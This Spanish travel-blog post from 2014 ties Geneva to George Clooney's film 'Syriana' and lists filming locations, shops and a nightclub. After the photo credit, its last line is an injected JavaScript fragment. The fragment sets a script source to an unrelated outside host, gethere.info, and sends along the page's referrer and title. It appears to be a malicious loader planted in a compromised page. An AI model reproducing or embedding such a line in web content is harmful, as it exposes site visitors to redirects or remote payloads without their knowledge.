Viajar a Ginebra es de cine

09/07/2014

Mujeriego, sex symbol, sibarita, refinado, elegante, con porte diplomático, atractivo, misterioso, poderoso, cosmopolita, vividor… ¿Te atreves a adivinar de quién estamos hablando? ¿ O de qué ciudad?

Nuestro destino de cine de hoy y el apuesto George Clooney tienen mucho en común. Te contaremos el qué, siempre que te subas a bordo y nos dejes acercarte hasta Ginebra. A continuación, pondremos rumbo a la tercera ciudad con más alta calidad de vida del mundo, un buen primer motivo por que el actor americano, como todo buen vividor que se precie, haría buenas migas con el otro protagonista, junto a Zurich, de ese admirable país llamado Suiza.

Entonces, ¿dónde radica la conexión entre la elegante estrella y la cosmopolita ciudad? Entre las películas que se han filmado en Ginebra se encuentra ‘Syriana’ (2005), por lo que la respuesta no es otra que este thriller político basado en la historia real de Robert Baer, un agente de la CIA que se pasó toda su vida trabajando para la Agencia en Oriente Medio e investigando casos de terrorismo. La película estadounidense, que protagonizó George Clooney junto a su amigo Matt Damon, le reportaría al primero muchas alegrías, así como un susto de los grandes. Por un lado, la cinta le valió en 2006 el Premio Oscar al mejor actor de reparto y el Globo de Oro al mejor actor secundario. Por otro, se comenta, se dice y se rumorea que en la escena de la tortura, el actor sufrió una aparatosa y grave lesión en la espalda, perdiendo parte de la memoria. Afortunadamente, un par de operaciones mediante, Clooney lograría finalmente recuperarse sin secuelas… Aunque sus sacrificios por la película ya habían ido más allá: para interpretar al agente de la CIA en ‘Syriana’, George tuvo que engordar más de 20 kilos y dejarse una frondosa y poco estética barba, aparcando así su imagen de sex symbol y su innegable atractivo.

Ginebra, como George, es refinada y poderosa. En ella se respira diplomacia, dinero y poder…, ¡es una ciudad fascinante! No es de extrañar, pues, sabiendo como sabemos que estamos ante la ciudad que alberga el mayor número de organizaciones internacionales del planeta y frente a uno de los centros financieros y diplomáticos mundiales por antonomasia, que para el director Stephen Gaghan fuera pan comido tropezar con las localizaciones adecuadas para los paseos de Clooney y Damon durante el rodaje de las escenas de Syriana en Ginebra, entre otras:

a) Varias de las grandes instituciones bancarias ginebrinas.

b) El histórico Palacio Wilson (52 rue des Pâquis), un bello edificio de cinco plantas y 225 habitaciones situado a orillas del Lago Leman, construido originalmente en el siglo XIX para albergar el Hotel Nacional, pasando con posterioridad a ser la sede de la Sociedad de Naciones y que acoge, hoy, la Oficina del Alto Comisionado para los Derechos Humanos (OACDH).

c) El Jardín Inglés, situado también al borde del lago Leman.

d) Cologny, uno de los barrios más lujosos de la hermosa ciudad.

e) El Hotel President Wilson (Quai Wilson, 47), lujoso establecimiento que debe su nombre al Presidente 28 de los Estados Unidos de América, Woodrow Wilson, fundador y defensor acérrimo de la citada Sociedad de las Naciones. En 2007, el hotel experimentó una suculenta renovación a manos de unos prestigiosos arquitectos suizos, tras la cual ha continuado, con gesto renovado, dando la bienvenida a personajes ilustres de todo el mundo.

Del Sr. Clooney también se apunta que es todo un sibarita. Por ende, le imaginamos de compras por Ginebra, beneficiándose de los precios ventajosos de la ciudad para hacerse con un buen reloj de pulsera, así como aprovechándose de los encantos del mercado gourmet por excelencia de Ginebra: Globus (48, rue du Rhône). Situado en la principal arteria comercial del casco antiguo, este elegante centro comercial ocupa cinco plantas bien nutridas de cosas bonitas, aunque es su zona de restaurantes y el supermercado de la planta baja donde miraremos, tocaremos y saborearemos los deliciosos productos gourmet.

¿Y qué pasa con el George de noche? Puesto que su fama de mujeriego le precede, la vida nocturna de Ginebra bien podría conducir los pasos del artista hasta la recién rebautizada discoteca Gold & Platinum (18 Quai du Seujet), un club selecto que atrae, en sus noches temáticas, a una clientela de lo más chic.

Ginebra. Hasta aquí nuestro repaso de cine por la ciudad suiza que mejor sabe vivir. ¿Vas a dejar que te lo cuenten? ¡Escápate ya!

Foto: malias

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;